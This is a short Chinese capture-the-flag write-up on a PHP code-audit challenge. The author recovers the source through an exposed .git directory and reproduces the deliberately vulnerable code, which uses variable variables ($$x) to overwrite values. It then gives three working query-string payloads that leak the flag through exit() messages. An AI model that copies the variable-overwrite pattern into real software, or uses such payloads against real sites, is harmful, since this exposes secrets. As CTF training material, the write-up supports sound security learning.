0x00 前言
比较基本的代码审计,考查变量覆盖 目录滚一下
Githack -> down一下 不知道为什么现在flag.php和index.php都down不下来了 --?可能靶场环境问题把 直接拿师傅wp里的源码了 关于对源码的个人理解我已标明在注释中
<?php
include 'flag.php';
$yds = "dog";
$is = "cat";
$handsome = 'yds';
foreach($_POST as $x => $y){
$$x = $y;
}
foreach($_GET as $x => $y){
$$x = $$y;
}
foreach($_GET as $x => $y){
if($_GET['flag'] === $x && $x !== 'flag'){
exit($handsome);
}
}
if(!isset($_GET['flag']) && !isset($_POST['flag'])){
exit($yds);
}
if($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag'){
exit($is);
}
echo "the flag is: ".$flag;
一开始没有想到能利用exit里的变量,丢脸了… 就想着过三层判断输出flag,没想到被自己覆盖了… 水平有限,至今没想出怎么绕过三个if且不覆盖的情况下在最后一层输出flag
0x01 三解
利用handsome
/?handsome=flag 通过如下 $handsome=$flag 从而成功获取flag 为满足条件退出追加两个参数 x=flag&flag=x
foreach($_GET as $x => $y){
$$x = $$y;
}
foreach($_GET as $x => $y){
if($_GET['flag'] === $x && $x !== 'flag'){
exit($handsome);
}
}
所以poc
/?handsome=flag&flag=x&x=flag
利用yds
比较简单 直接 /?yds=flag即可
foreach($_GET as $x => $y){
$$x = $$y;
}
if(!isset($_GET['flag']) && !isset($_POST['flag'])){
exit($yds);
}
利用is
/?is=flag&flag=flag
if($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag'){
exit($is);
}
参考文章
https://blog.csdn.net/qq_43622442/article/details/105925473
0x02 rethink
这篇有点水… 一步步来吧
|